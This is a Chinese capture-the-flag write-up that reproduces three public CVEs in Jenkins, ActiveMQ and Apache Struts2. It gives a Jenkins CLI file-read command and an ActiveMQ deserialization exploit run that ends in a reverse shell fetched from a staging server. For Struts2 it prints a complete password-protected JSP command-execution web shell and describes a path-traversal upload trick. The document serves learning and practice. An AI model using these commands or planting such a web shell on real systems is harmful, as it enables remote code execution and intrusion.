【Web】小白也能做的RWCTF体验赛baby题部分wp

遇到不会的题,怎么办!有的师傅告诉你完了,废了,寄了!只有Z3告诉你,稳辣!稳辣!都稳辣!

这种CVE复现的题型,不可能要求选手从0到1进行0day挖掘,其实考察的还是nday利用能力,我们需要快速进行信息检索并大致理解exp过程,赛后消化这些CVE,至少做到简单积累。

目录

①Be-a-Security-Researcher(CVE-2024-23897)

②Be-an-ActiveMq-Hacker(CVE-2023-46604)

③Be-More-Elegant(CVE-2023-50164)


①Be-a-Security-Researcher(CVE-2024-23897)

进来页面是这样的,一般都是套的框架,出题不至于重写。

起手就是一个搜索Jenkins CVE 2024

发现是CVE-2024-23897,下一步就嘎嘎一顿搜就好,找到自己能看懂的文章,进行CVE复现。

CVE-2024-23897&&CVE-2024-23898分析

payload:

java.exe -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/  -webSocket who-am-i "@/flag"

 

②Be-an-ActiveMq-Hacker(CVE-2023-46604)

虽然这题归在pwn里了,但兴趣使然瞄了一眼,发现直接给出CVE编号了,这不做了看看(

一顿搜就是

ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604) 

文章讲的很详细了,改个poc就可

payload:

nc-lvnp 1337

python3 -m http.server 3009

python3 poc.py 120.26.63.137 61616 http://124.222.136.33:3009/poc.xml

 

先起个服务器,把poc.xml放在3309端口

 

成功反弹shell,权限不够,直接./readflag

 

 

③Be-More-Elegant(CVE-2023-50164)

这题是文件上传,抓包看响应头,妥了,是jsp写shell

S2-066版本太高,我的漏扫工具都扫不出来(,之后是队里师傅试出来的,总之就是找新不找旧,找距今较新披露的jsp文件上传漏洞CVE吧。 

这题考的是Apache Struts2 文件上传漏洞分析(CVE-2023-50164)

因为是公用靶机,写jsp文件记得要加个密码。

<%
	if("0x401".equals(request.getParameter("pwd"))){
		java.io.InputStream in =
Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
		int a = -1;
		byte[] b = new byte[2048];
		out.print("<pre>");
		while((a=in.read(b))!=-1){
			out.println(new String(b));
		}
		out.print("</pre>");
	}
%>

fileUpload的f先小写传一次,会上传成功,然后再改成大写F,会覆盖先前路径,实现目录穿越

成功写shell

转载请说明出处内容投诉
CSS教程_站长资源网 » 【Web】小白也能做的RWCTF体验赛baby题部分wp

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买